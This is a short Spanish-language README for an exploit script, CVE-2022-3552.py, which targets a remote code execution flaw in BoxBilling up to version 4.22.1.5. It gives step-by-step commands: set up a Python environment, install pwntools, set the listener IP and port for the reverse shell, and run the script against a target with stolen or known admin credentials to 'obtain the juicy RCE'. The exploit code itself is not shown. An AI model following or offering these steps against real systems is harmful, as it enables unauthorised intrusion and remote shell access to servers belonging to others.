
CVE-2022-3552 Ejecución Remota de Código con pasos de explotación detallados
Para explotar la vulnerabilidad en BoxBlilling, la versión debe ser: "BoxBilling<=4.22.1.5" y debes tener credenciales de administrador válidas.
Si cumples con lo anterior, aquí están los pasos que debes seguir para obtener el jugoso RCE:
Crea un entorno virtual de Python (Linux)
python3 -m venv .venv
source .venv/bin/activate
Ahora instala esta biblioteca pwntools
pip3 install pwntools
Si se queja de dependencias faltantes, también podrías necesitar instalar algunos paquetes del sistema:
sudo apt update
sudo apt install python3-pwntools
En el código hay algunas líneas que requieren ajustes, esas son las líneas que determinan la IP del lhost y el puerto con el que planeas recibir la shell.
Si hiciste todo correctamente, ahora deberías poder ejecutar el exploit y obtener una shell! (-d = objetivo, -u = un correo electrónico de administrador válido, -p = la contraseña del administrador válido)
python3 CVE-2022-3552.py -d http://victimtarget.com -u [email protected] -p enterpassword1HERE